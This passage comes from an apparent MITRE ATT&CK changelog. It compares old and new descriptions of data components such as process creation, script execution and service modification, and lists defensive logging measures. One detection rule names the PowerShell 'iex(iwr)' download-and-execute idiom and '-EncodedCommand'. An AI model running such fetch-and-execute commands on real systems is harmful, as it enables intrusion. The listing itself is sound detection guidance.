- Extracts protocol headers and payload details into structured logs. `echo "redef Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr capture.pcap local.zeek`
- Suricata / Snort (IDS/IPS with PCAP Logging)
- Deep packet inspection (DPI) with signature-based and behavioral analysis. `suricata -c /etc/suricata/suricata.yaml -i eth0 -l /var/log/suricata`
- Host-Based Collection
- Sysmon Event ID 22 – DNS Query Logging, Captures DNS requests made by processes, useful for detecting C2 domains.
- Sysmon Event ID 3 – Network Connection Initiated, Logs process-to-network connection relationships.
- AuditD (Linux) – syscall=connect, Monitors outbound network requests from processes. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Traffic Collection
- AWS VPC Flow Logs / Azure NSG Flow Logs / Google VPC Flow Logs, Captures metadata about inbound/outbound network traffic.
- Cloud IDS (AWS GuardDuty, Azure Sentinel, Google Chronicle), Detects malicious activity in cloud environments by analyzing network traffic patterns. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Flow
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Summarized network packet data, with metrics, such as protoc | t | Summarized network packet data that captures session-level d |
| ol headers and volume (ex: Netflow or Zeek http.log) | | etails such as source/destination IPs, ports, protocol types |
| | | , timestamps, and data volume, without storing full packet p |
| | | ayloads. This is commonly used for traffic analysis, anomaly |
| | | detection, and network performance monitoring. *Data Colle |
| | | ction Measures:* - Network Flow Logs (Metadata Collection) |
| | | - NetFlow - Summarized metadata for network con |
| | | versations (no packet payloads). - sFlow (Sampled Flow L |
| | | ogging) - Captures sampled packets from switches and |
| | | routers. - Used for real-time traffic monitoring an |
| | | d anomaly detection. - Zeek (Bro) Flow Logs - Ze |
| | | ek logs session-level details in logs like conn.log, http.lo |
| | | g, dns.log, etc. - Host-Based Collection - Sysmon Event |
| | | ID 3 – Network Connection Initiated - Logs process-l |
| | | evel network activity, useful for detecting malicious outbou |
| | | nd connections. - AuditD (Linux) – syscall=connect |
| | | - Monitors system calls for network connections. `auditct |
| | | l -a always,exit -F arch=b64 -S connect -k network_activity` |
| | | - Cloud & SaaS Flow Monitoring - AWS VPC Flow Logs |
| | | - Captures metadata for traffic between EC2 instances, s |
| | | ecurity groups, and internet gateways. - Azure NSG Flow |
| | | Logs / Google VPC Flow Logs - Logs ingress/egress tr |
| | | affic for cloud-based resources. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:20.168Z |
| description | Summarized network packet data, with metrics, such as protocol headers and volume (ex: Netflow or Zeek http.log) | Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.
*Data Collection Measures:*
- Network Flow Logs (Metadata Collection)
- NetFlow
- Summarized metadata for network conversations (no packet payloads).
- sFlow (Sampled Flow Logging)
- Captures sampled packets from switches and routers.
- Used for real-time traffic monitoring and anomaly detection.
- Zeek (Bro) Flow Logs
- Zeek logs session-level details in logs like conn.log, http.log, dns.log, etc.
- Host-Based Collection
- Sysmon Event ID 3 – Network Connection Initiated
- Logs process-level network activity, useful for detecting malicious outbound connections.
- AuditD (Linux) – syscall=connect
- Monitors system calls for network connections. `auditctl -a always,exit -F arch=b64 -S connect -k network_activity`
- Cloud & SaaS Flow Monitoring
- AWS VPC Flow Logs
- Captures metadata for traffic between EC2 instances, security groups, and internet gateways.
- Azure NSG Flow Logs / Google VPC Flow Logs
- Logs ingress/egress traffic for cloud-based resources. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: OS API Execution
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Operating system function/method calls executed by a process | t | Calls made by a process to operating system-provided Applica |
| | | tion Programming Interfaces (APIs). These calls are essentia |
| | | l for interacting with system resources such as memory, file |
| | | s, and hardware, or for performing system-level tasks. Monit |
| | | oring these calls can provide insight into a process's inten |
| | | t, especially if the process is malicious. *Data Collection |
| | | Measures:* - Endpoint Detection and Response (EDR) Tools: |
| | | - Leverage tools to monitor API execution behaviors at t |
| | | he process level. - Example: Sysmon Event ID 10 captures |
| | | API call traces for process access and memory allocation. - |
| | | Process Monitor (ProcMon): - Use ProcMon to collect det |
| | | ailed logs of process and API activity. ProcMon can provide |
| | | granular details on API usage and identify malicious behavio |
| | | r during analysis. - Windows Event Logs: - Use Event IDs |
| | | from Windows logs for specific API-related activities: |
| | | - Event ID 4688: A new process has been created (can ind |
| | | irectly infer API use). - Event ID 4657: A registry |
| | | value has been modified (to monitor registry-altering APIs). |
| | | - Dynamic Analysis Tools: - Tools like Cuckoo Sandbox, |
| | | Flare VM, or Hybrid Analysis monitor API execution during ma |
| | | lware detonation. - Host-Based Logs: - On Linux/macOS sy |
| | | stems, leverage audit frameworks (e.g., `auditd`, `strace`) |
| | | to capture and analyze system call usage that APIs map to. - |
| | | Runtime Monitors: - Runtime security tools like Falco c |
| | | an monitor system-level calls for API execution. - Debugging |
| | | and Tracing: - Use debugging tools like gdb (Linux) or |
| | | WinDbg (Windows) for deep tracing of API executions in real |
| | | time. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-21T15:41:36.287Z | 2025-04-18T15:10:31.145Z |
| description | Operating system function/method calls executed by a process | Calls made by a process to operating system-provided Application Programming Interfaces (APIs). These calls are essential for interacting with system resources such as memory, files, and hardware, or for performing system-level tasks. Monitoring these calls can provide insight into a process's intent, especially if the process is malicious.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Leverage tools to monitor API execution behaviors at the process level.
- Example: Sysmon Event ID 10 captures API call traces for process access and memory allocation.
- Process Monitor (ProcMon):
- Use ProcMon to collect detailed logs of process and API activity. ProcMon can provide granular details on API usage and identify malicious behavior during analysis.
- Windows Event Logs:
- Use Event IDs from Windows logs for specific API-related activities:
- Event ID 4688: A new process has been created (can indirectly infer API use).
- Event ID 4657: A registry value has been modified (to monitor registry-altering APIs).
- Dynamic Analysis Tools:
- Tools like Cuckoo Sandbox, Flare VM, or Hybrid Analysis monitor API execution during malware detonation.
- Host-Based Logs:
- On Linux/macOS systems, leverage audit frameworks (e.g., `auditd`, `strace`) to capture and analyze system call usage that APIs map to.
- Runtime Monitors:
- Runtime security tools like Falco can monitor system-level calls for API execution.
- Debugging and Tracing:
- Use debugging tools like gdb (Linux) or WinDbg (Windows) for deep tracing of API executions in real time. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
Process: Process Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The initial construction of an executable managed by the OS, | t | Refers to the event in which a new process (executable) is i |
| that may involve one or more tasks or threads. (e.g. Win EI | | nitialized by an operating system. This can involve parent-c |
| D 4688, Sysmon EID 1, cmd.exe > net use, etc.) | | hild process relationships, process arguments, and environme |
| | | ntal variables. Monitoring process creation is crucial for d |
| | | etecting malicious behaviors, such as execution of unauthori |
| | | zed binaries, scripting abuse, or privilege escalation attem |
| | | pts. *Data Collection Measures:* - Endpoint Detection and |
| | | Response (EDR) Tools: - EDRs provide process telemetry, |
| | | tracking execution flows and arguments. - Windows Event Logs |
| | | : - Event ID 4688 (Audit Process Creation): Captures pro |
| | | cess creation with associated parent process. - Sysmon (Wind |
| | | ows): - Event ID 1 (Process Creation): Provides detailed |
| | | logging - Linux/macOS Monitoring: - AuditD (execve sysc |
| | | all): Logs process creation. - eBPF/XDP: Used for low-le |
| | | vel monitoring of system calls related to process execution. |
| | | - OSQuery: Allows SQL-like queries to track process eve |
| | | nts (process_events table). - Apple Endpoint Security Fr |
| | | amework (ESF): Monitors process creation on macOS. - Network |
| | | -Based Monitoring: - Zeek (Bro) Logs: Captures network-b |
| | | ased process execution related to remote shells. - Syslo |
| | | g/OSSEC: Tracks execution of processes on distributed system |
| | | s. - Behavioral SIEM Rules: - Monitor process creation f |
| | | or uncommon binaries in user directories. - Detect proce |
| | | sses with suspicious command-line arguments. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:15:56.932Z | 2025-04-18T15:10:27.797Z |
| description | The initial construction of an executable managed by the OS, that may involve one or more tasks or threads. (e.g. Win EID 4688, Sysmon EID 1, cmd.exe > net use, etc.) | Refers to the event in which a new process (executable) is initialized by an operating system. This can involve parent-child process relationships, process arguments, and environmental variables. Monitoring process creation is crucial for detecting malicious behaviors, such as execution of unauthorized binaries, scripting abuse, or privilege escalation attempts.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- EDRs provide process telemetry, tracking execution flows and arguments.
- Windows Event Logs:
- Event ID 4688 (Audit Process Creation): Captures process creation with associated parent process.
- Sysmon (Windows):
- Event ID 1 (Process Creation): Provides detailed logging
- Linux/macOS Monitoring:
- AuditD (execve syscall): Logs process creation.
- eBPF/XDP: Used for low-level monitoring of system calls related to process execution.
- OSQuery: Allows SQL-like queries to track process events (process_events table).
- Apple Endpoint Security Framework (ESF): Monitors process creation on macOS.
- Network-Based Monitoring:
- Zeek (Bro) Logs: Captures network-based process execution related to remote shells.
- Syslog/OSSEC: Tracks execution of processes on distributed systems.
- Behavioral SIEM Rules:
- Monitor process creation for uncommon binaries in user directories.
- Detect processes with suspicious command-line arguments. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Process: Process Termination
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4 | t | The exit or termination of a running process on a system. Th |
| 689) | | is can occur due to normal operations, user-initiated comman |
| | | ds, or malicious actions such as process termination by malw |
| | | are to disable security controls. *Data Collection Measures |
| | | :* - Endpoint Detection and Response (EDR) Tools: - Mon |
| | | itor process termination events. - Windows Event Logs: - |
| | | Event ID 4689 (Process Termination) – Captures when a proce |
| | | ss exits, including process ID and parent process. - Eve |
| | | nt ID 7036 (Service Control Manager) – Monitors system servi |
| | | ce stops. - Sysmon (Windows): - Event ID 5 (Process Term |
| | | ination) – Detects when a process exits, including parent-ch |
| | | ild relationships. - Linux/macOS Monitoring: - AuditD (` |
| | | execve`, `exit_group`, `kill` syscalls) – Captures process t |
| | | ermination via command-line interactions. - eBPF/XDP: Mo |
| | | nitors low-level system calls related to process termination |
| | | . - OSQuery: The processes table can be queried for abno |
| | | rmal exits. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:10:34.519Z |
| description | Exit of a running process (ex: Sysmon EID 5 or Windows EID 4689) | The exit or termination of a running process on a system. This can occur due to normal operations, user-initiated commands, or malicious actions such as process termination by malware to disable security controls.
*Data Collection Measures:*
- Endpoint Detection and Response (EDR) Tools:
- Monitor process termination events.
- Windows Event Logs:
- Event ID 4689 (Process Termination) – Captures when a process exits, including process ID and parent process.
- Event ID 7036 (Service Control Manager) – Monitors system service stops.
- Sysmon (Windows):
- Event ID 5 (Process Termination) – Detects when a process exits, including parent-child relationships.
- Linux/macOS Monitoring:
- AuditD (`execve`, `exit_group`, `kill` syscalls) – Captures process termination via command-line interactions.
- eBPF/XDP: Monitors low-level system calls related to process termination.
- OSQuery: The processes table can be queried for abnormal exits. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Scheduled Job: Scheduled Job Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new scheduled job (ex: Windows EID | t | The establishment of a task or job that will execute at a pr |
| 4698 or /var/log cron logs) | | edefined time or based on specific triggers. *Data Collecti |
| | | on Measures: * - Windows Event Logs: - Event ID 4698 (S |
| | | cheduled Task Created) – Detects the creation of new schedul |
| | | ed tasks. - Event ID 4702 (Scheduled Task Updated) – Ide |
| | | ntifies modifications to existing scheduled jobs. - Even |
| | | t ID 106 (TaskScheduler Operational Log) – Provides details |
| | | about scheduled task execution. - Sysmon (Windows): - Ev |
| | | ent ID 1 (Process Creation) – Detects the execution of suspi |
| | | cious tasks started by `schtasks.exe`, `at.exe`, or `taskeng |
| | | .exe`. - Linux/macOS Monitoring: - AuditD: Monitor modif |
| | | ications to `/etc/cron*`, `/var/spool/cron/`, and `crontab` |
| | | files. - Syslog: Capture cron job execution logs from `/ |
| | | var/log/cron`. - OSQuery: Query the `crontab` and `launc |
| | | hd` tables for scheduled job configurations. - Endpoint Dete |
| | | ction and Response (EDR) Tools: - Track scheduled task c |
| | | reation and modification events. - SIEM & XDR Detection Rule |
| | | s: - Monitor for scheduled jobs created by unusual users |
| | | . - Detect tasks executing scripts from non-standard dir |
| | | ectories. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:11:43.635Z |
| description | Initial construction of a new scheduled job (ex: Windows EID 4698 or /var/log cron logs) | The establishment of a task or job that will execute at a predefined time or based on specific triggers.
*Data Collection Measures: *
- Windows Event Logs:
- Event ID 4698 (Scheduled Task Created) – Detects the creation of new scheduled tasks.
- Event ID 4702 (Scheduled Task Updated) – Identifies modifications to existing scheduled jobs.
- Event ID 106 (TaskScheduler Operational Log) – Provides details about scheduled task execution.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Detects the execution of suspicious tasks started by `schtasks.exe`, `at.exe`, or `taskeng.exe`.
- Linux/macOS Monitoring:
- AuditD: Monitor modifications to `/etc/cron*`, `/var/spool/cron/`, and `crontab` files.
- Syslog: Capture cron job execution logs from `/var/log/cron`.
- OSQuery: Query the `crontab` and `launchd` tables for scheduled job configurations.
- Endpoint Detection and Response (EDR) Tools:
- Track scheduled task creation and modification events.
- SIEM & XDR Detection Rules:
- Monitor for scheduled jobs created by unusual users.
- Detect tasks executing scripts from non-standard directories. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Script: Script Execution
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | The execution of a text file that contains code via the inte | t | The execution of a text file that contains code via the inte |
| rpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) | | rpreter. *Data Collection Measures:* - Windows Event Logs: |
| | | - Event ID 4104 (PowerShell Script Block Logging) – Cap |
| | | tures full command-line execution of PowerShell scripts. |
| | | - Event ID 4688 (Process Creation) – Detects script executi |
| | | on by tracking process launches (`powershell.exe`, `wscript. |
| | | exe`, `cscript.exe`). - Event ID 5861 (Script Execution) |
| | | – Captures script execution via Windows Defender AMSI loggi |
| | | ng. - Sysmon (Windows): - Event ID 1 (Process Creation) |
| | | – Monitors script execution initiated by scripting engines. |
| | | - Event ID 11 (File Creation) – Detects new script files |
| | | written to disk before execution. - Endpoint Detection and |
| | | Response (EDR) Tools: - Track script execution behavior, |
| | | detect obfuscated commands, and prevent malicious scripts. |
| | | - PowerShell Logging: - Enable Module Logging: Logs all |
| | | loaded modules and cmdlets. - Enable Script Block Loggin |
| | | g: Captures complete PowerShell script execution history. - |
| | | SIEM Detection Rules: - Detect script execution with obf |
| | | uscated, encoded, or remote URLs. - Alert on script exec |
| | | utions using `-EncodedCommand` or `iex(iwr)`. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:16:55.269Z | 2025-04-18T15:12:46.164Z |
| description | The execution of a text file that contains code via the interpreter (e.g. Powershell, WMI, Windows EID 4104, etc.) | The execution of a text file that contains code via the interpreter.
*Data Collection Measures:*
- Windows Event Logs:
- Event ID 4104 (PowerShell Script Block Logging) – Captures full command-line execution of PowerShell scripts.
- Event ID 4688 (Process Creation) – Detects script execution by tracking process launches (`powershell.exe`, `wscript.exe`, `cscript.exe`).
- Event ID 5861 (Script Execution) – Captures script execution via Windows Defender AMSI logging.
- Sysmon (Windows):
- Event ID 1 (Process Creation) – Monitors script execution initiated by scripting engines.
- Event ID 11 (File Creation) – Detects new script files written to disk before execution.
- Endpoint Detection and Response (EDR) Tools:
- Track script execution behavior, detect obfuscated commands, and prevent malicious scripts.
- PowerShell Logging:
- Enable Module Logging: Logs all loaded modules and cmdlets.
- Enable Script Block Logging: Captures complete PowerShell script execution history.
- SIEM Detection Rules:
- Detect script execution with obfuscated, encoded, or remote URLs.
- Alert on script executions using `-EncodedCommand` or `iex(iwr)`. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Creation
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Initial construction of a new service/daemon (ex: Windows EI | t | The registration of a new service or daemon on an operating |
| D 4697 or /var/log daemon logs) | | system. *Data Collection Measures:* - Windows Event Logs |
| | | - Event ID 4697 - Captures the creation of a new Windows |
| | | service. - Event ID 7045 - Captures services installed b |
| | | y administrators or adversaries. - Event ID 7034 - Could |
| | | indicate malicious service modification or exploitation. - |
| | | Sysmon Logs - Sysmon Event ID 1 - Process Creation (capt |
| | | ures service executables). - Sysmon Event ID 4 - Service |
| | | state changes (detects service installation). - Sysmon |
| | | Event ID 13 - Registry modifications (captures service persi |
| | | stence changes). - PowerShell Logging - Monitor `New-Ser |
| | | vice` and `Set-Service` PowerShell cmdlets in Event ID 4104 |
| | | (Script Block Logging). - Linux/macOS Collection Methods |
| | | - AuditD & Syslog Daemon Logs (`/var/log/syslog`, `/var/log |
| | | /messages`, `/var/log/daemon.log`) - AuditD Rules: |
| | | - `auditctl -w /etc/systemd/system -p wa -k service_creat |
| | | ion` - Detects changes to `systemd` service configur |
| | | ations. - Systemd Journals (`journalctl -u <service_name>`) |
| | | - Captures newly created systemd services. - LaunchDaemo |
| | | ns & LaunchAgents (macOS) - Monitor `/Library/LaunchDaem |
| | | ons/` and `/Library/LaunchAgents/` for new plist files. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:54.408Z |
| description | Initial construction of a new service/daemon (ex: Windows EID 4697 or /var/log daemon logs) | The registration of a new service or daemon on an operating system.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4697 - Captures the creation of a new Windows service.
- Event ID 7045 - Captures services installed by administrators or adversaries.
- Event ID 7034 - Could indicate malicious service modification or exploitation.
- Sysmon Logs
- Sysmon Event ID 1 - Process Creation (captures service executables).
- Sysmon Event ID 4 - Service state changes (detects service installation).
- Sysmon Event ID 13 - Registry modifications (captures service persistence changes).
- PowerShell Logging
- Monitor `New-Service` and `Set-Service` PowerShell cmdlets in Event ID 4104 (Script Block Logging).
- Linux/macOS Collection Methods
- AuditD & Syslog Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`)
- AuditD Rules:
- `auditctl -w /etc/systemd/system -p wa -k service_creation`
- Detects changes to `systemd` service configurations.
- Systemd Journals (`journalctl -u `)
- Captures newly created systemd services.
- LaunchDaemons & LaunchAgents (macOS)
- Monitor `/Library/LaunchDaemons/` and `/Library/LaunchAgents/` for new plist files. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Service: Service Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a service/daemon, such as changes to name, d | t | Changes made to an existing service or daemon, such as modif |
| escription, and/or start type (ex: Windows EID 7040 or /var/ | | ying the service name, start type, execution parameters, or |
| log daemon logs) | | security configurations. *Data Collection Measures: * - Wi |
| | | ndows Event Logs - Event ID 7040 - Detects modifications |
| | | to the startup behavior of a service. - Event ID 7045 - |
| | | Can capture changes made to existing services. - Event |
| | | ID 7036 - Tracks when services start or stop, potentially in |
| | | dicating malicious tampering. - Event ID 4697 - Can dete |
| | | ct when an adversary reinstalls a service with different par |
| | | ameters. - Sysmon Logs - Sysmon Event ID 13 - Detects ch |
| | | anges to service configurations in the Windows Registry (e.g |
| | | ., `HKLM\SYSTEM\CurrentControlSet\Services\`). - Sysmon |
| | | Event ID 1 - Can track execution of `sc.exe` or `PowerShell |
| | | Set-Service`. - PowerShell Logging - Event ID 4104 (Scri |
| | | pt Block Logging) - Captures execution of commands like `Set |
| | | -Service`, `New-Service`, or `sc config`. - Command-Line |
| | | Logging (Event ID 4688) - Tracks usage of service modificat |
| | | ion commands: - `sc config <service_name> start= aut |
| | | o` - `sc qc <service_name>` - Linux/macOS Collec |
| | | tion Methods - Systemd Journals (`journalctl -u <service |
| | | _name>`) Tracks modifications to systemd service configurati |
| | | ons. - Daemon Logs (`/var/log/syslog`, `/var/log/message |
| | | s`, `/var/log/daemon.log`) Captures changes to service state |
| | | and execution parameters. - AuditD Rules for Service Mo |
| | | dification - Monitor modifications to `/etc/systemd |
| | | /system/` for new or altered service unit files: `auditctl - |
| | | w /etc/systemd/system/ -p wa -k service_modification` |
| | | - Track execution of `systemctl` or `service` commands: `a |
| | | uditctl -a always,exit -F arch=b64 -S execve -F a0=systemctl |
| | | -F key=service_mod` - OSQuery for Linux/macOS Monitorin |
| | | g - Query modified services using OSQuery’s `process |
| | | es` or `system_info` tables: `SELECT * FROM systemd_units WH |
| | | ERE state != 'running';` - macOS Launch Daemon/Agent Mod |
| | | ification - Monitor for changes in: - `/ |
| | | Library/LaunchDaemons/` - `/Library/LaunchAgents |
| | | /` - Track modifications to `.plist` files indicatin |
| | | g persistence attempts. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:57.700Z |
| description | Changes made to a service/daemon, such as changes to name, description, and/or start type (ex: Windows EID 7040 or /var/log daemon logs) | Changes made to an existing service or daemon, such as modifying the service name, start type, execution parameters, or security configurations.
*Data Collection Measures: *
- Windows Event Logs
- Event ID 7040 - Detects modifications to the startup behavior of a service.
- Event ID 7045 - Can capture changes made to existing services.
- Event ID 7036 - Tracks when services start or stop, potentially indicating malicious tampering.
- Event ID 4697 - Can detect when an adversary reinstalls a service with different parameters.
- Sysmon Logs
- Sysmon Event ID 13 - Detects changes to service configurations in the Windows Registry (e.g., `HKLM\SYSTEM\CurrentControlSet\Services\`).
- Sysmon Event ID 1 - Can track execution of `sc.exe` or `PowerShell Set-Service`.
- PowerShell Logging
- Event ID 4104 (Script Block Logging) - Captures execution of commands like `Set-Service`, `New-Service`, or `sc config`.
- Command-Line Logging (Event ID 4688) - Tracks usage of service modification commands:
- `sc config start= auto`
- `sc qc `
- Linux/macOS Collection Methods
- Systemd Journals (`journalctl -u `) Tracks modifications to systemd service configurations.
- Daemon Logs (`/var/log/syslog`, `/var/log/messages`, `/var/log/daemon.log`) Captures changes to service state and execution parameters.
- AuditD Rules for Service Modification
- Monitor modifications to `/etc/systemd/system/` for new or altered service unit files: `auditctl -w /etc/systemd/system/ -p wa -k service_modification`
- Track execution of `systemctl` or `service` commands: `auditctl -a always,exit -F arch=b64 -S execve -F a0=systemctl -F key=service_mod`
- OSQuery for Linux/macOS Monitoring
- Query modified services using OSQuery’s `processes` or `system_info` tables: `SELECT * FROM systemd_units WHERE state != 'running';`
- macOS Launch Daemon/Agent Modification
- Monitor for changes in:
- `/Library/LaunchDaemons/`
- `/Library/LaunchAgents/`
- Track modifications to `.plist` files indicating persistence attempts. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
User Account: User Account Authentication
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | An attempt by a user to gain access to a network or computin | t | An attempt (successful and failed login attempts) by a user, |
| g resource, often by providing credentials (ex: Windows EID | | service, or application to gain access to a network, system |
| 4776 or /var/log/auth.log) | | , or cloud-based resource. This typically involves credentia |
| | | ls such as passwords, tokens, multi-factor authentication (M |
| | | FA), or biometric validation. *Data Collection Measures:* |
| | | - Host-Based Authentication Logs - Windows Event Logs |
| | | - Event ID 4776 – NTLM authentication attempt. |
| | | - Event ID 4624 – Successful user logon. - Event ID |
| | | 4625 – Failed authentication attempt. - Event ID 46 |
| | | 48 – Explicit logon with alternate credentials. - Linux/ |
| | | macOS Authentication Logs - `/var/log/auth.log`, `/v |
| | | ar/log/secure` – Logs SSH, sudo, and other authentication at |
| | | tempts. - AuditD – Tracks authentication events via |
| | | PAM modules. - macOS Unified Logs – `/var/db/diagnos |
| | | tics` captures authentication failures. - Cloud Authenticati |
| | | on Logs - Azure AD Logs - Sign-in Logs – Tracks |
| | | authentication attempts, MFA challenges, and conditional acc |
| | | ess failures. - Audit Logs – Captures authentication |
| | | -related configuration changes. - Microsoft Graph AP |
| | | I – Provides real-time sign-in analytics. - Google Works |
| | | pace & Office 365 - Google Admin Console – `User Log |
| | | in Report` tracks login attempts and failures. - Off |
| | | ice 365 Unified Audit Logs – Captures logins across Exchange |
| | | , SharePoint, and Teams. - AWS CloudTrail & IAM |
| | | - Tracks authentication via `AWS IAM AuthenticateUser` and ` |
| | | sts:GetSessionToken`. - Logs failed authentications |
| | | to AWS Management Console and API requests. - Container Auth |
| | | entication Monitoring - Kubernetes Authentication Logs |
| | | - kubectl audit logs – Captures authentication attemp |
| | | ts for service accounts and admin users. - Azure Kub |
| | | ernetes Service (AKS) and Google Kubernetes Engine (GKE) – L |
| | | ogs IAM authentication events. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:19:46.282Z | 2025-04-18T15:09:42.067Z |
| description | An attempt by a user to gain access to a network or computing resource, often by providing credentials (ex: Windows EID 4776 or /var/log/auth.log) | An attempt (successful and failed login attempts) by a user, service, or application to gain access to a network, system, or cloud-based resource. This typically involves credentials such as passwords, tokens, multi-factor authentication (MFA), or biometric validation.
*Data Collection Measures:*
- Host-Based Authentication Logs
- Windows Event Logs
- Event ID 4776 – NTLM authentication attempt.
- Event ID 4624 – Successful user logon.
- Event ID 4625 – Failed authentication attempt.
- Event ID 4648 – Explicit logon with alternate credentials.
- Linux/macOS Authentication Logs
- `/var/log/auth.log`, `/var/log/secure` – Logs SSH, sudo, and other authentication attempts.
- AuditD – Tracks authentication events via PAM modules.
- macOS Unified Logs – `/var/db/diagnostics` captures authentication failures.
- Cloud Authentication Logs
- Azure AD Logs
- Sign-in Logs – Tracks authentication attempts, MFA challenges, and conditional access failures.
- Audit Logs – Captures authentication-related configuration changes.
- Microsoft Graph API – Provides real-time sign-in analytics.
- Google Workspace & Office 365
- Google Admin Console – `User Login Report` tracks login attempts and failures.
- Office 365 Unified Audit Logs – Captures logins across Exchange, SharePoint, and Teams.
- AWS CloudTrail & IAM
- Tracks authentication via `AWS IAM AuthenticateUser` and `sts:GetSessionToken`.
- Logs failed authentications to AWS Management Console and API requests.
- Container Authentication Monitoring
- Kubernetes Authentication Logs
- kubectl audit logs – Captures authentication attempts for service accounts and admin users.
- Azure Kubernetes Service (AKS) and Google Kubernetes Engine (GKE) – Logs IAM authentication events. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Windows Registry: Windows Registry Key Deletion
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EI | t | The removal of a registry key within the Windows operating s |
| D 12) | | ystem. *Data Collection Measures:* - Windows Event Logs |
| | | - Event ID 4658 - Registry Key Handle Closed: Captures whe |
| | | n a handle to a registry key is closed, which may indicate d |
| | | eletion. - Event ID 4660 - Object Deleted: Logs when a r |
| | | egistry key is deleted. - Sysmon (System Monitor) for Window |
| | | s - Sysmon Event ID 12 - Registry Key Deleted: Logs when |
| | | a registry key is removed. - Sysmon Event ID 13 - Regis |
| | | try Value Deleted: Captures removal of specific registry val |
| | | ues. - Endpoint Detection and Response (EDR) Solutions - |
| | | Monitor registry deletions for suspicious behavior. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:12:03.268Z |
| description | Removal of a Registry Key (ex: Windows EID 4658 or Sysmon EID 12) | The removal of a registry key within the Windows operating system.
*Data Collection Measures:*
- Windows Event Logs
- Event ID 4658 - Registry Key Handle Closed: Captures when a handle to a registry key is closed, which may indicate deletion.
